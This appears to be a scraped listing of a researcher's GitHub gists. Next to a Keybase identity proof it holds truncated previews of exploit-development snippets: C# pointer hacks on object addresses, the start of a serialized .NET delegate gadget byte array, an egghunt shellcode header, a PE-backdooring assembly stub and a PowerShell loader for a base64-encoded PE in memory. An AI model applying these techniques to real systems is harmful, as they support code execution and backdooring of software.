I hereby claim:
- I am tophertimzen on github.
- I am ttimzen (https://keybase.io/ttimzen) on keybase.
- I have a public key ASDujVwoiebsWPA5e5Xk4wd9blw29002bROa67GXKNbZ5Qo
To claim this, I am signing this object:
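// Instantiate GrayFrost.testClass via reflection so the object is created by the
// runtime's normal path (public parameterless constructor) before its address is
// read back with getObjectAddr.
Type reference = typeof(GrayFrost.testClass);
// GetConstructor returns null (no exception) when there is no public parameterless
// constructor; fail with a descriptive error instead of a NullReferenceException
// on the Invoke below.
ConstructorInfo ctor = reference.GetConstructor(Type.EmptyTypes);
if (ctor == null)
{
    throw new MissingMethodException(reference.FullName, ".ctor");
}
object wantedObject = ctor.Invoke(new object[] { });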
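/// <summary>
/// Returns a raw address for <paramref name="wantedObject"/> by reading a stack slot
/// near a local variable, relying on the JIT having placed the incoming reference there.
/// </summary>
/// <remarks>
/// NOTE(review): this is a stack-layout hack, not an API. It assumes the value three
/// pointer-sized slots below the local <c>objectPointer</c> is the reference that was
/// passed in; that only holds for one particular JIT, architecture and optimization
/// level (presumably the 32-bit, unoptimized build the author used) and breaks silently
/// elsewhere. The returned address is also not pinned, so the GC may move the object.
/// If a stable address is genuinely needed, pin with
/// <see cref="System.Runtime.InteropServices.GCHandle"/> or a <c>fixed</c> statement.
/// Requires compiling with /unsafe.
/// </remarks>
/// <param name="wantedObject">Object whose reference value is read off the stack; it is never dereferenced here.</param>
/// <returns>The pointer-sized value found three slots below the local, presumed to be the object's address.</returns>
public static IntPtr getObjectAddr(object wantedObject)
{
    // The seed value is arbitrary; the local only exists so there is a slot to take the address of.
    IntPtr objectPointer = (IntPtr)5;
    // Fix: the C# keyword is lower-case `unsafe`; `Unsafe { ... }` does not compile.
    unsafe
    {
        return objectPointer = *(&objectPointer - 3);
    }
}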
/// <summary>
/// Turns a raw address back into an object reference by overwriting the stack slot of a
/// placeholder local with the pointer value and then returning that local.
/// </summary>
/// <remarks>
/// NOTE(review): mirror image of getObjectAddr and just as fragile — it assumes the slot
/// one pointer below <c>pointer</c> is the one holding <c>refer</c>, which depends on the
/// JIT, architecture and optimization level. Nothing checks that <paramref name="ptrIN"/>
/// points at a live managed object: a stale or arbitrary pointer becomes a reference the
/// GC will follow, so a wrong input can corrupt the heap or crash the runtime rather than
/// fail cleanly. Requires compiling with /unsafe.
/// </remarks>
/// <param name="ptrIN">Address assumed (not verified) to be a managed object.</param>
/// <returns>The placeholder local, whose slot is expected to now contain <paramref name="ptrIN"/>.</returns>
public static object GetInstance(IntPtr ptrIN) | |
{ | |
// Placeholder reference; the Type object is irrelevant, its stack slot is what gets overwritten.
object refer = ptrIN.GetType(); | |
IntPtr pointer = ptrIN; | |
unsafe | |
{ | |
// Copies the pointer value into the adjacent slot, presumed to be `refer`.
*(&pointer - 1) = *(&pointer); | |
} | |
return refer; | |
} |
I hereby claim:
To claim this, I am signing this object:
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
/* | |
* Optimized egghunt shellcode for win32 (32 bytes) | |
* | |
* Credits: http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
* | |
* Description | |
* | |
 * This code works by abusing an NT syscall (NtAccessCheckAndAuditAlarm)
* whereby it uses the kernel to validate whether or not a set of addresses | |
* is valid, and, if it is, whether or not they match the 8 byte egg we're |
''' | |
HeapWalker - Walking Windows 7 process heaps using pydbg | |
Author : Debasish Mandal | |
Blog :http://www.debasish.in/ | |
Twitter : https://twitter.com/debasishm89 | |
Description : This python script is the simplest implementation of the Windows HeapWalk() API.
It uses pydbg and lets the user walk through the debuggee process's heaps on the fly.
; Topher Timzen | |
; Messing around with PE backdooring for CTP/OSCE; wanted to create a new thread inside the process to avoid synchronization issues.
; Contains plenty of NULL bytes: it was placed directly into a PE rather than delivered as shellcode, so there was no need to avoid them.
; nasm CreateThread.asm -o CreateThread.raw; xxd -p CreateThread.raw | tr -d '\n' | |
[BITS 32] | |
[SECTION .text] | |
global _start |
# Build a throwaway dynamic assembly that a module can later be loaded into from
# memory. NOTE(review): AppDomain.DefineDynamicAssembly is a .NET Framework
# (Windows PowerShell) API; on .NET Core / PowerShell 7 the equivalent is
# [System.Reflection.Emit.AssemblyBuilder]::DefineDynamicAssembly.
$Domain = [System.AppDomain]::CurrentDomain
$DynAssembly = New-Object -TypeName System.Reflection.AssemblyName -ArgumentList 'TempAssembly'
# Run-only access: nothing is ever written to disk.
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Stub module that the in-memory module is loaded into (mimics loading a netmodule at runtime).
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [System.Reflection.TypeAttributes]::Public)
# Bake the type; the resulting [Type] falls through to the pipeline, as in the original.
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |